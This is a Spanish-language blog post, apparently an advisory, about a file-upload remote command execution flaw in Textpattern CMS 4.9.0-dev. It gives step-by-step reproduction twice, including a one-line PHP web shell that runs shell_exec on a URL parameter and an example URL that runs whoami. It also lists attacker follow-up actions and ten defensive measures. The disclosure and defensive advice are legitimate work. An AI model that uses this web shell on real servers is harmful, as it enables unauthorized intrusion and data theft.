La vulnerabilidad en Textpattern CMS 4.9.0-dev

La vulnerabilidad en Textpattern CMS 4.9.0-dev

Spread the love
Listen to this article

La vulnerabilidad en Textpattern CMS 4.9.0-dev permite la ejecución remota de comandos (RCE) a través de la carga de archivos. Los usuarios autenticados pueden subir archivos PHP sin restricciones, lo que permite la ejecución de comandos en el servidor.

Reproducción:

  1. Iniciar sesión como usuario root en Textpattern.
  2. Crear un archivo PHP (rce.php) con <?php echo shell_exec($_GET['cmd']); ?>.
  3. Subir el archivo a través de ‘Content > Files’.
  4. Acceder al archivo y ejecutar comandos usando cmd=id.

Para más detalles, visita el repositorio en GitHub.

Aquí tienes los pasos para explotar la vulnerabilidad en Textpattern CMS 4.9.0-dev:

  1. Inicia sesión en Textpattern como usuario autenticado.
  2. Crea un archivo PHP malicioso, por ejemplo, rce.php, con el siguiente contenido:
   <?php echo shell_exec($_GET['cmd']); ?>
  1. Sube el archivo a través de la opción “Content > Files” en el panel de administración de Textpattern.
  2. Accede al archivo subido en el servidor, utilizando una URL similar a:
   http://tu-sitio.com/path/to/uploaded/rce.php?cmd=whoami
  1. Ejecuta comandos en el servidor remoto modificando el parámetro cmd en la URL.

Para más detalles, visita el repositorio en GitHub.

Acciones del atacante tras explotar la vulnerabilidad

  1. Ejecutar comandos del sistema 📜
  2. Escalar privilegios 🛠️
  3. Instalar malware 🦠
  4. Robo de datos 📂
  5. Crear cuentas de administrador 👤
  6. Eliminar o modificar archivos 🗑️
  7. Instalar backdoors 🚪
  8. Interrumpir servicios 🔧
  9. Desplegar ransomware 💰
  10. Capturar tráfico de red 🌐

Medidas de defensa

  1. Actualizar Textpattern: Usa la última versión del CMS.
  2. Restricciones de carga: Permitir solo tipos de archivos seguros.
  3. Validación y sanitización: Asegúrate de que los archivos subidos sean seguros.
  4. Permisos de archivos: Restringe permisos de escritura y ejecución.
  5. Monitoreo de logs: Revisa registros para detectar actividades sospechosas.
  6. Implementar WAF: Usa un firewall de aplicaciones web.
  7. Autenticación multifactor: Aumenta la seguridad de acceso.
  8. Copia de seguridad regular: Mantén copias de seguridad de los datos.
  9. Deshabilitar la ejecución de PHP: En directorios de carga.
  10. Capacitación de usuarios: Educa a los usuarios sobre prácticas de seguridad.

0 0 votos
Article Rating
Suscribir
Notificar de
guest
0 Comments
Más antiguo
La mas nueva Más votado
Comentarios en línea
Ver todos los comentarios